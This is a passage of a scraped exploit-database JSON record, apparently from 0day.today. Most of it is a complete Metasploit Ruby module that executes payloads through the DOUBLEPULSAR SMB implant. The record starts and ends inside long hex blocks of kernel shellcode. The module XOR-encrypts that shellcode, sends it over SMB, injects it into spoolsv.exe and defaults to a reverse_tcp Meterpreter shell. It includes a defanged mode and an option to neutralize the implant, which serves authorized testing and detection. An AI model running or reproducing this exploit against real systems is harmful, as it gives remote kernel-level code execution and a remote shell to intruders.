\"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2019-12-04] #"}, "lastseen": "2019-12-04T03:58:12", "differentElements": ["cvss2", "cvss3", "reporter", "sourceData", "title"], "edition": 1}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "e709376f2108634253e243227abda9cd", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit\n", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-01T13:26:49", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-27803", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96707", "SMNTC-96705", "SMNTC-96706", "SMNTC-96709", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}], "modified": "2019-12-04T03:58:12", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2019-12-04T03:58:12", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 